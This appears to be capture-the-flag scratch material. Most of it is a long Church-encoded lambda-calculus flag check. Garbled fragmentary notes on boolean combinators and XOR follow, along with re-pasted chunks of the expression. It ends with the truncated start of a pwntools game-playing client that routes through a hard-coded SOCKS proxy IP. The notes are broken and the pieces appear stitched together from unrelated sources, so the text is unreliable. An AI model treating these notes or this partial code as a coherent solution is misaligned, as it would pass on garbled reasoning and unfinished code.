(((lambda s_124 lambda s_239 ((lambda s_210 lambda s_187 ((210)(210))(187))(((lambda
s_145 lambda s_8 ((145)(8))(145))(239))((lambda s_15 lambda s_122 lambda s_191 ((15)
(191))(122))(124))))(((lambda s_237 lambda s_127 ((237)(127))(237))((lambda s_6 lambda
s_192 lambda s_246 ((6)(246))(192))(239)))(124)))(lambda s_0 lambda s_1 0))(lambda s_46
lambda s_19 19))))(((lambda s_189 lambda s_193 ((lambda s_62 lambda s_248 ((62)(62))
(248))(((lambda s_66 lambda s_245 ((66)(245))(66))(193))((lambda s_4 lambda s_168
lambda s_15 ((4)(15))(168))(189))))(((lambda s_252 lambda s_161 ((252)(161))(252))
((lambda s_54 lambda s_239 lambda s_119 ((54)(119))(239))(193)))(189)))(lambda s_1
lambda s_0 1))(lambda s_26 lambda s_197 197))))(((lambda s_124 lambda s_53 ((lambda
s_49 lambda s_162 ((49)(49))(162))(((lambda s_34 lambda s_106 ((34)(106))(34))(53))
((lambda s_138 lambda s_47 lambda s_112 ((138)(112))(47))(124))))(((lambda s_227 lambda
s_234 ((227)(234))(227))((lambda s_93 lambda s_32 lambda s_142 ((93)(142))(32))(53)))
(124)))(lambda s_0 lambda s_1 1))(lambda s_86 lambda s_159 86))))(((lambda s_72 lambda
s_156 ((lambda s_166 lambda s_16 ((166)(166))(16))(((lambda s_70 lambda s_187 ((70)
(187))(70))(156))((lambda s_111 lambda s_234 lambda s_251 ((111)(251))(234))(72))))
(((lambda s_78 lambda s_93 ((78)(93))(78))((lambda s_30 lambda s_203 lambda s_71 ((30)
(71))(203))(156)))(72)))(lambda s_0 lambda s_1 0))(lambda s_171 lambda s_157 157))))
(((lambda s_115 lambda s_205 ((lambda s_16 lambda s_130 ((16)(16))(130))(((lambda s_168
lambda s_59 ((168)(59))(168))(205))((lambda s_13 lambda s_119 lambda s_5 ((13)(5))
(119))(115))))(((lambda s_253 lambda s_110 ((253)(110))(253))((lambda s_139 lambda s_7
lambda s_206 ((139)(206))(7))(205)))(115)))(lambda s_1 lambda s_0 0))(lambda s_73
lambda s_24 73))))(((lambda s_180 lambda s_39 ((lambda s_5 lambda s_80 ((5)(5))(80))
(((lambda s_231 lambda s_150 ((231)(150))(231))(39))((lambda s_248 lambda s_251 lambda
s_253 ((248)(253))(251))(180))))(((lambda s_24 lambda s_135 ((24)(135))(24))((lambda
s_225 lambda s_223 lambda s_64 ((225)(64))(223))(39)))(180)))(lambda s_1 lambda s_0 1))
(lambda s_146 lambda s_239 239))))(((lambda s_88 lambda s_0 ((lambda s_244 lambda s_17
((244)(244))(17))(((lambda s_74 lambda s_180 ((74)(180))(74))(0))((lambda s_240 lambda
s_23 lambda s_71 ((240)(71))(23))(88))))(((lambda s_98 lambda s_40 ((98)(40))(98))
((lambda s_114 lambda s_72 lambda s_165 ((114)(165))(72))(0)))(88)))(lambda s_1 lambda
s_0 1))(lambda s_61 lambda s_113 113))))(((lambda s_239 lambda s_236 ((lambda s_108
lambda s_202 ((108)(108))(202))(((lambda s_37 lambda s_119 ((37)(119))(37))(236))
((lambda s_238 lambda s_172 lambda s_75 ((238)(75))(172))(239))))(((lambda s_54 lambda
s_26 ((54)(26))(54))((lambda s_168 lambda s_44 lambda s_151 ((168)(151))(44))(236)))
(239)))(lambda s_1 lambda s_0 1))(lambda s_153 lambda s_34 34))))(((lambda s_57 lambda
s_187 ((lambda s_75 lambda s_250 ((75)(75))(250))(((lambda s_150 lambda s_74 ((150)
(74))(150))(187))((lambda s_18 lambda s_90 lambda s_85 ((18)(85))(90))(57))))(((lambda
s_22 lambda s_68 ((22)(68))(22))((lambda s_151 lambda s_71 lambda s_166 ((151)(166))
(71))(187)))(57)))(lambda s_0 lambda s_1 1))(lambda s_230 lambda s_234 230))))(((lambda
s_253 lambda s_125 ((lambda s_115 lambda s_157 ((115)(115))(157))(((lambda s_229 lambda
s_214 ((229)(214))(229))(125))((lambda s_74 lambda s_63 lambda s_113 ((74)(113))(63))
(253))))(((lambda s_81 lambda s_46 ((81)(46))(81))((lambda s_156 lambda s_226 lambda
s_6 ((156)(6))(226))(125)))(253)))(lambda s_1 lambda s_0 0))(lambda s_79 lambda s_150
79))))(((lambda s_9 lambda s_79 ((lambda s_252 lambda s_18 ((252)(252))(18))(((lambda
s_62 lambda s_229 ((62)(229))(62))(79))((lambda s_195 lambda s_48 lambda s_68 ((195)
(68))(48))(9))))(((lambda s_33 lambda s_19 ((33)(19))(33))((lambda s_164 lambda s_241
lambda s_109 ((164)(109))(241))(79)))(9)))(lambda s_1 lambda s_0 1))(lambda s_253
lambda s_5 5))))(((lambda s_175 lambda s_216 ((lambda s_140 lambda s_89 ((140)(140))
(89))(((lambda s_208 lambda s_237 ((208)(237))(208))(216))((lambda s_94 lambda s_192
lambda s_73 ((94)(73))(192))(175))))(((lambda s_8 lambda s_164 ((8)(164))(8))((lambda
s_219 lambda s_0 lambda s_131 ((219)(131))(0))(216)))(175)))(lambda s_1 lambda s_0 1))
(lambda s_26 lambda s_91 91))))(((lambda s_15 lambda s_186 ((lambda s_191 lambda s_147
((191)(191))(147))(((lambda s_32 lambda s_218 ((32)(218))(32))(186))((lambda s_45
lambda s_160 lambda s_144 ((45)(144))(160))(15))))(((lambda s_106 lambda s_5 ((106)(5))
(106))((lambda s_29 lambda s_79 lambda s_221 ((29)(221))(79))(186)))(15)))(lambda s_1
lambda s_0 0))(lambda s_192 lambda s_72 192))))(((lambda s_80 lambda s_138 ((lambda
s_220 lambda s_101 ((220)(220))(101))(((lambda s_89 lambda s_218 ((89)(218))(89))(138))
((lambda s_137 lambda s_45 lambda s_57 ((137)(57))(45))(80))))(((lambda s_56 lambda
s_216 ((56)(216))(56))((lambda s_108 lambda s_57 lambda s_223 ((108)(223))(57))(138)))
(80)))(lambda s_0 lambda s_1 0))(lambda s_247 lambda s_115 115))))(((lambda s_92 lambda
s_87 ((lambda s_55 lambda s_155 ((55)(55))(155))(((lambda s_125 lambda s_199 ((125)
(199))(125))(87))((lambda s_94 lambda s_60 lambda s_1 ((94)(1))(60))(92))))(((lambda
s_151 lambda s_125 ((151)(125))(151))((lambda s_82 lambda s_244 lambda s_4 ((82)(4))
(244))(87)))(92)))(lambda s_0 lambda s_1 0))(lambda s_155 lambda s_249 249))))(((lambda
s_80 lambda s_182 ((lambda s_215 lambda s_126 ((215)(215))(126))(((lambda s_240 lambda
s_141 ((240)(141))(240))(182))((lambda s_141 lambda s_100 lambda s_138 ((141)(138))
(100))(80))))(((lambda s_33 lambda s_215 ((33)(215))(33))((lambda s_245 lambda s_224
lambda s_86 ((245)(86))(224))(182)))(80)))(lambda s_0 lambda s_1 0))(lambda s_178
lambda s_37 37))))(((lambda s_219 lambda s_27 ((lambda s_151 lambda s_180 ((151)(151))
(180))(((lambda s_60 lambda s_148 ((60)(148))(60))(27))((lambda s_79 lambda s_129
lambda s_61 ((79)(61))(129))(219))))(((lambda s_204 lambda s_182 ((204)(182))(204))
((lambda s_115 lambda s_58 lambda s_14 ((115)(14))(58))(27)))(219)))(lambda s_1 lambda
s_0 0))(lambda s_125 lambda s_168 125))))(((lambda s_162 lambda s_160 ((lambda s_74
lambda s_100 ((74)(74))(100))(((lambda s_34 lambda s_248 ((34)(248))(34))(160))((lambda
s_235 lambda s_198 lambda s_50 ((235)(50))(198))(162))))(((lambda s_113 lambda s_171
((113)(171))(113))((lambda s_225 lambda s_124 lambda s_30 ((225)(30))(124))(160)))
(162)))(lambda s_0 lambda s_1 1))(lambda s_178 lambda s_249 178))))(((lambda s_116
lambda s_221 ((lambda s_101 lambda s_225 ((101)(101))(225))(((lambda s_50 lambda s_52
((50)(52))(50))(221))((lambda s_72 lambda s_202 lambda s_172 ((72)(172))(202))(116))))
(((lambda s_110 lambda s_82 ((110)(82))(110))((lambda s_160 lambda s_237 lambda s_42
((160)(42))(237))(221)))(116)))(lambda s_1 lambda s_0 1))(lambda s_135 lambda s_112
112))))(((lambda s_89 lambda s_215 ((lambda s_184 lambda s_253 ((184)(184))(253))
(((lambda s_91 lambda s_227 ((91)(227))(91))(215))((lambda s_108 lambda s_16 lambda
s_31 ((108)(31))(16))(89))))(((lambda s_2 lambda s_57 ((2)(57))(2))((lambda s_226
lambda s_52 lambda s_114 ((226)(114))(52))(215)))(89)))(lambda s_0 lambda s_1 0))
(lambda s_98 lambda s_59 59))))(((lambda s_53 lambda s_95 ((lambda s_123 lambda s_121
((123)(123))(121))(((lambda s_207 lambda s_175 ((207)(175))(207))(95))((lambda s_45
lambda s_55 lambda s_130 ((45)(130))(55))(53))))(((lambda s_169 lambda s_191 ((169)
(191))(169))((lambda s_59 lambda s_58 lambda s_74 ((59)(74))(58))(95)))(53)))(lambda
s_1 lambda s_0 0))(lambda s_34 lambda s_28 34))))(((lambda s_161 lambda s_239 ((lambda
s_4 lambda s_146 ((4)(4))(146))(((lambda s_8 lambda s_7 ((8)(7))(8))(239))((lambda
s_110 lambda s_113 lambda s_10 ((110)(10))(113))(161))))(((lambda s_1 lambda s_30 ((1)
(30))(1))((lambda s_72 lambda s_246 lambda s_23 ((72)(23))(246))(239)))(161)))(lambda
s_1 lambda s_0 0))(lambda s_210 lambda s_245 210))))(((lambda s_40 lambda s_77 ((lambda
s_57 lambda s_242 ((57)(57))(242))(((lambda s_108 lambda s_211 ((108)(211))(108))(77))
((lambda s_216 lambda s_236 lambda s_219 ((216)(219))(236))(40))))(((lambda s_164
lambda s_49 ((164)(49))(164))((lambda s_211 lambda s_24 lambda s_101 ((211)(101))(24))
(77)))(40)))(lambda s_1 lambda s_0 0))(lambda s_102 lambda s_21 102))))(((lambda s_129
lambda s_228 ((lambda s_193 lambda s_124 ((193)(193))(124))(((lambda s_32 lambda s_232
((32)(232))(32))(228))((lambda s_227 lambda s_43 lambda s_201 ((227)(201))(43))(129))))
(((lambda s_180 lambda s_83 ((180)(83))(180))((lambda s_122 lambda s_68 lambda s_87
((122)(87))(68))(228)))(129)))(lambda s_1 lambda s_0 0))(lambda s_235 lambda s_105
235))))(((lambda s_4 lambda s_149 ((lambda s_163 lambda s_179 ((163)(163))(179))
(((lambda s_16 lambda s_147 ((16)(147))(16))(149))((lambda s_23 lambda s_85 lambda
s_125 ((23)(125))(85))(4))))(((lambda s_185 lambda s_237 ((185)(237))(185))((lambda
s_255 lambda s_137 lambda s_205 ((255)(205))(137))(149)))(4)))(lambda s_1 lambda s_0
0))(lambda s_88 lambda s_251 88))))(((lambda s_92 lambda s_69 ((lambda s_72 lambda s_97
((72)(72))(97))(((lambda s_76 lambda s_189 ((76)(189))(76))(69))((lambda s_103 lambda
s_152 lambda s_202 ((103)(202))(152))(92))))(((lambda s_19 lambda s_230 ((19)(230))
(19))((lambda s_247 lambda s_21 lambda s_49 ((247)(49))(21))(69)))(92)))(lambda s_1
lambda s_0 1))(lambda s_24 lambda s_253 253))))(((lambda s_43 lambda s_114 ((lambda
s_56 lambda s_207 ((56)(56))(207))(((lambda s_40 lambda s_239 ((40)(239))(40))(114))
((lambda s_27 lambda s_196 lambda s_207 ((27)(207))(196))(43))))(((lambda s_138 lambda
s_121 ((138)(121))(138))((lambda s_100 lambda s_124 lambda s_145 ((100)(145))(124))
(114)))(43)))(lambda s_0 lambda s_1 1))(lambda s_182 lambda s_150 182))))(((lambda
s_106 lambda s_140 ((lambda s_229 lambda s_242 ((229)(229))(242))(((lambda s_159 lambda
s_2 ((159)(2))(159))(140))((lambda s_237 lambda s_3 lambda s_77 ((237)(77))(3))(106))))
(((lambda s_124 lambda s_62 ((124)(62))(124))((lambda s_71 lambda s_118 lambda s_74
((71)(74))(118))(140)))(106)))(lambda s_1 lambda s_0 0))(lambda s_137 lambda s_250
137))))(((lambda s_198 lambda s_155 ((lambda s_175 lambda s_202 ((175)(175))(202))
(((lambda s_74 lambda s_182 ((74)(182))(74))(155))((lambda s_98 lambda s_198 lambda
s_241 ((98)(241))(198))(198))))(((lambda s_116 lambda s_52 ((116)(52))(116))((lambda
s_135 lambda s_200 lambda s_142 ((135)(142))(200))(155)))(198)))(lambda s_0 lambda s_1
0))(lambda s_121 lambda s_188 188))))(((lambda s_47 lambda s_115 ((lambda s_138 lambda
s_71 ((138)(138))(71))(((lambda s_242 lambda s_59 ((242)(59))(242))(115))((lambda s_122
lambda s_117 lambda s_196 ((122)(196))(117))(47))))(((lambda s_216 lambda s_184 ((216)
(184))(216))((lambda s_252 lambda s_34 lambda s_17 ((252)(17))(34))(115)))(47)))(lambda
s_1 lambda s_0 1))(lambda s_247 lambda s_67 67))))(((lambda s_209 lambda s_182 ((lambda
s_140 lambda s_68 ((140)(140))(68))(((lambda s_153 lambda s_22 ((153)(22))(153))(182))
((lambda s_73 lambda s_101 lambda s_45 ((73)(45))(101))(209))))(((lambda s_164 lambda
s_9 ((164)(9))(164))((lambda s_1 lambda s_221 lambda s_216 ((1)(216))(221))(182)))
(209)))(lambda s_1 lambda s_0 1))(lambda s_73 lambda s_10 10))))(((lambda s_86 lambda
s_225 ((lambda s_124 lambda s_229 ((124)(124))(229))(((lambda s_68 lambda s_118 ((68)
(118))(68))(225))((lambda s_209 lambda s_153 lambda s_196 ((209)(196))(153))(86))))
(((lambda s_193 lambda s_110 ((193)(110))(193))((lambda s_125 lambda s_59 lambda s_227
((125)(227))(59))(225)))(86)))(lambda s_1 lambda s_0 1))(lambda s_47 lambda s_244
244))))(((lambda s_64 lambda s_134 ((lambda s_248 lambda s_49 ((248)(248))(49))
(((lambda s_105 lambda s_62 ((105)(62))(105))(134))((lambda s_69 lambda s_226 lambda
s_17 ((69)(17))(226))(64))))(((lambda s_92 lambda s_232 ((92)(232))(92))((lambda s_99
lambda s_234 lambda s_67 ((99)(67))(234))(134)))(64)))(lambda s_0 lambda s_1 1))(lambda
s_157 lambda s_8 157))))(((lambda s_232 lambda s_246 ((lambda s_239 lambda s_170 ((239)
(239))(170))(((lambda s_93 lambda s_252 ((93)(252))(93))(246))((lambda s_53 lambda s_30
lambda s_170 ((53)(170))(30))(232))))(((lambda s_62 lambda s_205 ((62)(205))(62))
((lambda s_164 lambda s_109 lambda s_125 ((164)(125))(109))(246)))(232)))(lambda s_0
lambda s_1 0))(lambda s_57 lambda s_177 177))))(((lambda s_234 lambda s_40 ((lambda
s_104 lambda s_141 ((104)(104))(141))(((lambda s_108 lambda s_109 ((108)(109))(108))
(40))((lambda s_78 lambda s_224 lambda s_50 ((78)(50))(224))(234))))(((lambda s_205
lambda s_81 ((205)(81))(205))((lambda s_50 lambda s_55 lambda s_172 ((50)(172))(55))
(40)))(234)))(lambda s_0 lambda s_1 1))(lambda s_120 lambda s_10 120))))(((lambda s_162
lambda s_155 ((lambda s_163 lambda s_34 ((163)(163))(34))(((lambda s_31 lambda s_44
((31)(44))(31))(155))((lambda s_171 lambda s_83 lambda s_255 ((171)(255))(83))(162))))
(((lambda s_186 lambda s_60 ((186)(60))(186))((lambda s_7 lambda s_158 lambda s_245
((7)(245))(158))(155)))(162)))(lambda s_1 lambda s_0 1))(lambda s_229 lambda s_148
148))))(((lambda s_59 lambda s_68 ((lambda s_74 lambda s_65 ((74)(74))(65))(((lambda
s_63 lambda s_79 ((63)(79))(63))(68))((lambda s_103 lambda s_21 lambda s_192 ((103)
(192))(21))(59))))(((lambda s_190 lambda s_94 ((190)(94))(190))((lambda s_247 lambda
s_26 lambda s_120 ((247)(120))(26))(68)))(59)))(lambda s_1 lambda s_0 0))(lambda s_176
lambda s_75 176))))(((lambda s_145 lambda s_241 ((lambda s_190 lambda s_116 ((190)
(190))(116))(((lambda s_101 lambda s_190 ((101)(190))(101))(241))((lambda s_46 lambda
s_99 lambda s_143 ((46)(143))(99))(145))))(((lambda s_60 lambda s_6 ((60)(6))(60))
((lambda s_124 lambda s_226 lambda s_148 ((124)(148))(226))(241)))(145)))(lambda s_0
lambda s_1 1))(lambda s_125 lambda s_39 125))))(((lambda s_218 lambda s_143 ((lambda
s_59 lambda s_224 ((59)(59))(224))(((lambda s_120 lambda s_118 ((120)(118))(120))(143))
((lambda s_234 lambda s_14 lambda s_192 ((234)(192))(14))(218))))(((lambda s_74 lambda
s_222 ((74)(222))(74))((lambda s_252 lambda s_170 lambda s_5 ((252)(5))(170))(143)))
(218)))(lambda s_0 lambda s_1 1))(lambda s_149 lambda s_230 149))))(((lambda s_107
lambda s_16 ((lambda s_148 lambda s_218 ((148)(148))(218))(((lambda s_217 lambda s_40
((217)(40))(217))(16))((lambda s_144 lambda s_58 lambda s_148 ((144)(148))(58))(107))))
(((lambda s_2 lambda s_80 ((2)(80))(2))((lambda s_104 lambda s_100 lambda s_92 ((104)
(92))(100))(16)))(107)))(lambda s_1 lambda s_0 1))(lambda s_34 lambda s_98 98))))
(((lambda s_247 lambda s_107 ((lambda s_134 lambda s_130 ((134)(134))(130))(((lambda
s_68 lambda s_110 ((68)(110))(68))(107))((lambda s_16 lambda s_247 lambda s_204 ((16)
(204))(247))(247))))(((lambda s_66 lambda s_56 ((66)(56))(66))((lambda s_195 lambda
s_149 lambda s_64 ((195)(64))(149))(107)))(247)))(lambda s_0 lambda s_1 1))(lambda s_43
lambda s_61 43))))(((lambda s_140 lambda s_222 ((lambda s_118 lambda s_43 ((118)(118))
(43))(((lambda s_135 lambda s_178 ((135)(178))(135))(222))((lambda s_239 lambda s_131
lambda s_137 ((239)(137))(131))(140))))(((lambda s_65 lambda s_12 ((65)(12))(65))
((lambda s_39 lambda s_251 lambda s_108 ((39)(108))(251))(222)))(140)))(lambda s_0
lambda s_1 0))(lambda s_124 lambda s_2 2))))(((lambda s_69 lambda s_248 ((lambda s_184
lambda s_64 ((184)(184))(64))(((lambda s_161 lambda s_24 ((161)(24))(161))(248))
((lambda s_10 lambda s_92 lambda s_98 ((10)(98))(92))(69))))(((lambda s_1 lambda s_56
((1)(56))(1))((lambda s_146 lambda s_10 lambda s_9 ((146)(9))(10))(248)))(69)))(lambda
s_1 lambda s_0 1))(lambda s_67 lambda s_51 51))))(((lambda s_22 lambda s_50 ((lambda
s_135 lambda s_210 ((135)(135))(210))(((lambda s_48 lambda s_164 ((48)(164))(48))(50))
((lambda s_154 lambda s_118 lambda s_49 ((154)(49))(118))(22))))(((lambda s_122 lambda
s_136 ((122)(136))(122))((lambda s_107 lambda s_8 lambda s_165 ((107)(165))(8))(50)))
(22)))(lambda s_1 lambda s_0 1))(lambda s_107 lambda s_116 116))))(((lambda s_220
lambda s_199 ((lambda s_123 lambda s_204 ((123)(123))(204))(((lambda s_248 lambda s_110
((248)(110))(248))(199))((lambda s_4 lambda s_90 lambda s_133 ((4)(133))(90))(220))))
(((lambda s_250 lambda s_111 ((250)(111))(250))((lambda s_161 lambda s_179 lambda s_214
((161)(214))(179))(199)))(220)))(lambda s_0 lambda s_1 0))(lambda s_154 lambda s_175
175))))(((lambda s_6 lambda s_83 ((lambda s_2 lambda s_213 ((2)(2))(213))(((lambda
s_207 lambda s_220 ((207)(220))(207))(83))((lambda s_29 lambda s_99 lambda s_238 ((29)
(238))(99))(6))))(((lambda s_214 lambda s_186 ((214)(186))(214))((lambda s_203 lambda
s_247 lambda s_161 ((203)(161))(247))(83)))(6)))(lambda s_1 lambda s_0 1))(lambda s_235
lambda s_113 113))))(((lambda s_68 lambda s_118 ((lambda s_63 lambda s_186 ((63)(63))
(186))(((lambda s_11 lambda s_75 ((11)(75))(11))(118))((lambda s_79 lambda s_46 lambda
s_15 ((79)(15))(46))(68))))(((lambda s_251 lambda s_211 ((251)(211))(251))((lambda s_26
lambda s_41 lambda s_35 ((26)(35))(41))(118)))(68)))(lambda s_1 lambda s_0 1))(lambda
s_163 lambda s_185 185))))(((lambda s_9 lambda s_239 ((lambda s_246 lambda s_163 ((246)
(246))(163))(((lambda s_175 lambda s_221 ((175)(221))(175))(239))((lambda s_199 lambda
s_54 lambda s_98 ((199)(98))(54))(9))))(((lambda s_178 lambda s_109 ((178)(109))(178))
((lambda s_48 lambda s_61 lambda s_226 ((48)(226))(61))(239)))(9)))(lambda s_1 lambda
s_0 1))(lambda s_14 lambda s_44 44))))(((lambda s_192 lambda s_123 ((lambda s_250
lambda s_66 ((250)(250))(66))(((lambda s_13 lambda s_180 ((13)(180))(13))(123))((lambda
s_58 lambda s_206 lambda s_239 ((58)(239))(206))(192))))(((lambda s_40 lambda s_14
((40)(14))(40))((lambda s_187 lambda s_63 lambda s_61 ((187)(61))(63))(123)))(192)))
(lambda s_1 lambda s_0 1))(lambda s_99 lambda s_194 194))))(((lambda s_218 lambda s_38
((lambda s_180 lambda s_77 ((180)(180))(77))(((lambda s_176 lambda s_1 ((176)(1))(176))
(38))((lambda s_63 lambda s_131 lambda s_99 ((63)(99))(131))(218))))(((lambda s_51
lambda s_148 ((51)(148))(51))((lambda s_40 lambda s_37 lambda s_22 ((40)(22))(37))
(38)))(218)))(lambda s_1 lambda s_0 0))(lambda s_231 lambda s_137 231))))(((lambda
s_162 lambda s_43 ((lambda s_199 lambda s_9 ((199)(199))(9))(((lambda s_51 lambda s_26
((51)(26))(51))(43))((lambda s_84 lambda s_225 lambda s_83 ((84)(83))(225))(162))))
(((lambda s_252 lambda s_112 ((252)(112))(252))((lambda s_80 lambda s_170 lambda s_187
((80)(187))(170))(43)))(162)))(lambda s_0 lambda s_1 0))(lambda s_137 lambda s_115
115))))(((lambda s_79 lambda s_161 ((lambda s_102 lambda s_9 ((102)(102))(9))(((lambda
s_95 lambda s_103 ((95)(103))(95))(161))((lambda s_48 lambda s_37 lambda s_218 ((48)
(218))(37))(79))))(((lambda s_60 lambda s_253 ((60)(253))(60))((lambda s_105 lambda
s_204 lambda s_113 ((105)(113))(204))(161)))(79)))(lambda s_0 lambda s_1 1))(lambda
s_114 lambda s_158 114))))(((lambda s_157 lambda s_210 ((lambda s_112 lambda s_39
((112)(112))(39))(((lambda s_238 lambda s_131 ((238)(131))(238))(210))((lambda s_60
lambda s_32 lambda s_192 ((60)(192))(32))(157))))(((lambda s_41 lambda s_65 ((41)(65))
(41))((lambda s_89 lambda s_31 lambda s_86 ((89)(86))(31))(210)))(157)))(lambda s_0
lambda s_1 0))(lambda s_12 lambda s_70 70))))(((lambda s_216 lambda s_109 ((lambda
s_164 lambda s_252 ((164)(164))(252))(((lambda s_175 lambda s_210 ((175)(210))(175))
(109))((lambda s_77 lambda s_253 lambda s_182 ((77)(182))(253))(216))))(((lambda s_186
lambda s_18 ((186)(18))(186))((lambda s_213 lambda s_206 lambda s_93 ((213)(93))(206))
(109)))(216)))(lambda s_0 lambda s_1 0))(lambda s_59 lambda s_147 147))))(((lambda s_22
lambda s_128 ((lambda s_45 lambda s_226 ((45)(45))(226))(((lambda s_64 lambda s_225
((64)(225))(64))(128))((lambda s_249 lambda s_240 lambda s_148 ((249)(148))(240))
(22))))(((lambda s_233 lambda s_101 ((233)(101))(233))((lambda s_230 lambda s_31 lambda
s_227 ((230)(227))(31))(128)))(22)))(lambda s_0 lambda s_1 1))(lambda s_90 lambda s_142
90))))(((lambda s_69 lambda s_32 ((lambda s_211 lambda s_94 ((211)(211))(94))(((lambda
s_160 lambda s_146 ((160)(146))(160))(32))((lambda s_217 lambda s_190 lambda s_52
((217)(52))(190))(69))))(((lambda s_135 lambda s_75 ((135)(75))(135))((lambda s_222
lambda s_154 lambda s_11 ((222)(11))(154))(32)))(69)))(lambda s_1 lambda s_0 0))(lambda
s_21 lambda s_25 21))))(((lambda s_24 lambda s_192 ((lambda s_234 lambda s_235 ((234)
(234))(235))(((lambda s_115 lambda s_54 ((115)(54))(115))(192))((lambda s_21 lambda
s_20 lambda s_73 ((21)(73))(20))(24))))(((lambda s_156 lambda s_112 ((156)(112))(156))
((lambda s_134 lambda s_214 lambda s_151 ((134)(151))(214))(192)))(24)))(lambda s_0
lambda s_1 0))(lambda s_100 lambda s_37 37))))(((lambda s_254 lambda s_77 ((lambda s_26
lambda s_74 ((26)(26))(74))(((lambda s_9 lambda s_47 ((9)(47))(9))(77))((lambda s_241
lambda s_84 lambda s_12 ((241)(12))(84))(254))))(((lambda s_220 lambda s_147 ((220)
(147))(220))((lambda s_87 lambda s_107 lambda s_142 ((87)(142))(107))(77)))(254)))
(lambda s_1 lambda s_0 1))(lambda s_45 lambda s_1 1))))(((lambda s_218 lambda s_233
((lambda s_12 lambda s_141 ((12)(12))(141))(((lambda s_214 lambda s_4 ((214)(4))(214))
(233))((lambda s_68 lambda s_201 lambda s_170 ((68)(170))(201))(218))))(((lambda s_124
lambda s_37 ((124)(37))(124))((lambda s_107 lambda s_48 lambda s_149 ((107)(149))(48))
(233)))(218)))(lambda s_0 lambda s_1 0))(lambda s_147 lambda s_78 78))))(((lambda s_200
lambda s_97 ((lambda s_176 lambda s_169 ((176)(176))(169))(((lambda s_96 lambda s_179
((96)(179))(96))(97))((lambda s_87 lambda s_101 lambda s_159 ((87)(159))(101))(200))))
(((lambda s_7 lambda s_45 ((7)(45))(7))((lambda s_219 lambda s_118 lambda s_250 ((219)
(250))(118))(97)))(200)))(lambda s_1 lambda s_0 1))(lambda s_62 lambda s_130 130))))
(((lambda s_253 lambda s_104 ((lambda s_65 lambda s_203 ((65)(65))(203))(((lambda s_175
lambda s_238 ((175)(238))(175))(104))((lambda s_36 lambda s_37 lambda s_238 ((36)(238))
(37))(253))))(((lambda s_203 lambda s_113 ((203)(113))(203))((lambda s_222 lambda s_241
lambda s_25 ((222)(25))(241))(104)))(253)))(lambda s_0 lambda s_1 0))(lambda s_138
lambda s_210 210))))(((lambda s_189 lambda s_55 ((lambda s_162 lambda s_242 ((162)
(162))(242))(((lambda s_242 lambda s_201 ((242)(201))(242))(55))((lambda s_80 lambda
s_70 lambda s_117 ((80)(117))(70))(189))))(((lambda s_55 lambda s_183 ((55)(183))(55))
((lambda s_196 lambda s_120 lambda s_224 ((196)(224))(120))(55)))(189)))(lambda s_1
lambda s_0 1))(lambda s_125 lambda s_10 10))))(((lambda s_4 lambda s_14 ((lambda s_244
lambda s_254 ((244)(244))(254))(((lambda s_54 lambda s_220 ((54)(220))(54))(14))
((lambda s_88 lambda s_84 lambda s_82 ((88)(82))(84))(4))))(((lambda s_88 lambda s_183
((88)(183))(88))((lambda s_5 lambda s_66 lambda s_32 ((5)(32))(66))(14)))(4)))(lambda
s_1 lambda s_0 0))(lambda s_222 lambda s_105 222))))(((lambda s_125 lambda s_201
((lambda s_74 lambda s_36 ((74)(74))(36))(((lambda s_98 lambda s_122 ((98)(122))(98))
(201))((lambda s_20 lambda s_42 lambda s_122 ((20)(122))(42))(125))))(((lambda s_219
lambda s_117 ((219)(117))(219))((lambda s_51 lambda s_60 lambda s_249 ((51)(249))(60))
(201)))(125)))(lambda s_1 lambda s_0 1))(lambda s_5 lambda s_102 102))))(((lambda s_173
lambda s_217 ((lambda s_178 lambda s_126 ((178)(178))(126))(((lambda s_144 lambda s_219
((144)(219))(144))(217))((lambda s_159 lambda s_179 lambda s_222 ((159)(222))(179))
(173))))(((lambda s_247 lambda s_164 ((247)(164))(247))((lambda s_122 lambda s_123
lambda s_8 ((122)(8))(123))(217)))(173)))(lambda s_0 lambda s_1 1))(lambda s_20 lambda
s_165 20))))(((lambda s_132 lambda s_128 ((lambda s_215 lambda s_99 ((215)(215))(99))
(((lambda s_67 lambda s_122 ((67)(122))(67))(128))((lambda s_14 lambda s_197 lambda
s_255 ((14)(255))(197))(132))))(((lambda s_126 lambda s_199 ((126)(199))(126))((lambda
s_62 lambda s_58 lambda s_26 ((62)(26))(58))(128)))(132)))(lambda s_0 lambda s_1 1))
(lambda s_197 lambda s_119 197))))(((lambda s_39 lambda s_215 ((lambda s_181 lambda s_0
((181)(181))(0))(((lambda s_148 lambda s_237 ((148)(237))(148))(215))((lambda s_98
lambda s_6 lambda s_43 ((98)(43))(6))(39))))(((lambda s_231 lambda s_103 ((231)(103))
(231))((lambda s_170 lambda s_20 lambda s_154 ((170)(154))(20))(215)))(39)))(lambda s_1
lambda s_0 1))(lambda s_18 lambda s_51 51))))(((lambda s_53 lambda s_3 ((lambda s_132
lambda s_53 ((132)(132))(53))(((lambda s_148 lambda s_11 ((148)(11))(148))(3))((lambda
s_213 lambda s_61 lambda s_25 ((213)(25))(61))(53))))(((lambda s_202 lambda s_113
((202)(113))(202))((lambda s_155 lambda s_75 lambda s_103 ((155)(103))(75))(3)))(53)))
(lambda s_0 lambda s_1 1))(lambda s_183 lambda s_252 183))))(((lambda s_211 lambda s_87
((lambda s_115 lambda s_88 ((115)(115))(88))(((lambda s_162 lambda s_127 ((162)(127))
(162))(87))((lambda s_32 lambda s_184 lambda s_87 ((32)(87))(184))(211))))(((lambda
s_171 lambda s_37 ((171)(37))(171))((lambda s_10 lambda s_134 lambda s_234 ((10)(234))
church bool
and (lambda x lambda y x y x)
not (lambda p lambda a lambda b p b a)
truefalse
true
137flagbit
andtrue
flag_xxor x y
x&~y| (~x&y)
trueflag
(lambda s_108 lambda s_226 108) trueflag(lambda s_1 lambda s_0 137)137
0false
flagbits8flag
3*3
(134))(87)))(211)))(lambda s_1 lambda s_0 0))(lambda s_108 lambda s_226 108))
((lambda s_91 lambda s_70 ((91)(70))(91))
((lambda s_10 lambda s_134 lambda s_234 ((10)(234))(134))
(lambda s_108 lambda s_226 108)
((lambda x lambda y ( (or ((and y) (not x))) ((and (not y)) x) ) lambda s_1 lambda s_0
137) true)
from pwn import *
import random
from pwnlib.util.proc import status
context.proxy = (socks.SOCKS5, '146.56.247.105', 8010)
def move(board, x, y, val):
global boards
p.sendlineafter('>', f'{board} {x} {y} {val}')
boards[board][x][y] = val
check_solved1()
def get_move():
global boards, opp_choice
p.recvuntil('< ')
board, x, y, val = map(int, p.recvline().split())
opp_choice = board
print('opp:', board, x, y, val)
boards[board][x][y] = val
def check_solved():
# global boards
global solved
